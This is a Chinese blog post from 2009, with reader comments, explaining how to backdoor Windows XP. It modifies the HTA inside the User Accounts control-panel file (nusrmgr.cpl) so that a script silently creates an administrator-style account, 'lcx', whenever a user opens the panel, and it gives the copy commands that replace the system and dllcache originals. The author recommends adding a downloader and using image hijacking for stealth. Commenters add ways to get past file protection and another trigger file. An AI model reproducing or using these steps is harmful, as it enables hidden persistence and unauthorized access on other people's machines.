百度空间 | 百度首页 
 
查看文章
 
利用cpl文件在xp中留一个后门
2009年07月02日 星期四 下午 12:28

先请看图:

这是我用restorator 打开nusrmgr.cpl时的情形。你看到了什么?是不是很吃惊,原来xp中控制面板中的“用户帐户”选项竟然是html做的。其实不然,微软的好多组件的面板都是html做的。这也是微软为什么一直无法清掉ie的原因,它牵涉太多了,就算是反垄断法也不可能让微软删掉ie的。

看到图中的那个NUSRMGR.HTA文件了吗?我们可以用它来做下手脚(当然你选别的js文件也是可以的)

我们在里边加几行js语句:

var WshShell = CreateObject("WScript.Shell")
WshShell.Run("net.exe user lcx lcx /add", 0, true)

当然你加下载者更好,我只是做个示例。

然后:

echo y|copy nusrmgr.cpl c:\windows\system32\dllcache\nusrmgr.cpl
echo y|copy nusrmgr.cpl c:\windows\system32\nusrmgr.cpl

替换原来的文件。这样以后用户再调用控制面板里的“用户帐户”选项后,就会自动给你加一个帐户了。

这算是一个思路了,应当很鸡肋。如果要完美一点,可以查看一下别的cpl文件如何更改,如何无声无息的替掉原来的文件(如镜像劫持)。


类别:默认分类 | 添加到搜藏 | 浏览() | 评论 (9)
 
最近读者:
 
网友评论:
1
2009年07月02日 星期四 下午 12:33 | 回复
sofa
 
2
2009年07月02日 星期四 下午 12:35 | 回复
很猥琐的技巧
 
3
2009年07月02日 星期四 下午 05:41 | 回复
 
4
2009年07月02日 星期四 下午 06:09 | 回复
够猥亵。。嘿嘿。。
CPL不被WFP保护么?
要替换就得替换,经常被使用到的
 
5
2009年07月02日 星期四 下午 06:38 | 回复
可以实现无声无息的替换的,或者镜像劫持到改好的那个nusrmgr.cpl就可以
 
6
2009年07月03日 星期五 上午 09:24 | 回复
膜拜...学习了!!!
 
7
2009年07月16日 星期四 上午 10:01 | 回复
看起来好完美
 
8
2009年07月18日 星期六 下午 04:21 | 回复
nb
干掉wfp参看我的文章
 
9
2009年08月12日 星期三 下午 05:37 | 回复
还可以用这个留后门:
%windir%\pchealth\helpctr\System\HomePage__DESKTOP.htm

调用系统帮助(helpctr.exe)时触发。
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu